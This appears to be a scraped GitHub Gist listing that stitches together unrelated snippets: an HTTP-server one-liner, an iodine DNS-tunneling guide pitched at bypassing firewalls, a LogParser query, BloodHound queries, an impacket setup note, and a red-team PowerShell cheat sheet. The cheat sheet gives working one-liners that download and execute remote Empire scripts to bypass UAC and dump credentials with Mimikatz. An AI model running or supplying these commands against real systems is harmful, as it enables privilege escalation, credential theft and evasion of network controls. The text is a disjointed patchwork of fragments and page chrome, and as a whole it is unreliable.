Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
centraliota
nukeador
/ DNS tunneling with iodine.md
Last active
December 14, 2024 15:13
How to install and use iodine for DNS tunneling.
This guide provides detailed steps for setting up DNS records, configuring a DNS tunneling server and client, and setting up a browser for secure proxy connections.
- Bypassing Network Restrictions: iodine excels in environments with strict network restrictions. It utilizes DNS queries, which are typically allowed through firewalls, to tunnel data where traditional methods like VPNs might be blocked.
- Efficient for Limited Bandwidth: Ideal for situations with bandwidth limitations, iodine requires less bandwidth compared to standard VPNs, making it a practical choice for networks with restricted data flow.
- Customizability and Open Source: As an open-source tool, iodine offers extensive customization options. Users with specific technical needs or those interested in a hands-on approach to network tunneling can tailor iodine to their requirements.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Logparser | |
| ############### | |
| # Security Log | |
| ############### | |
| # Find Event id | |
| & 'C:\Program Files (x86)\Log Parser 2.2\LogParser.exe' -stats:OFF -i:EVT "SELECT * FROM 'Security.evtx' WHERE EventID = '5038'" |
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "queries": [{ | |
| "name": "List all owned users", | |
| "queryList": [{ | |
| "final": true, | |
| "query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m" | |
| }] | |
| }, | |
| { | |
| "name": "List all owned computers", |
This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.
Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:
git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .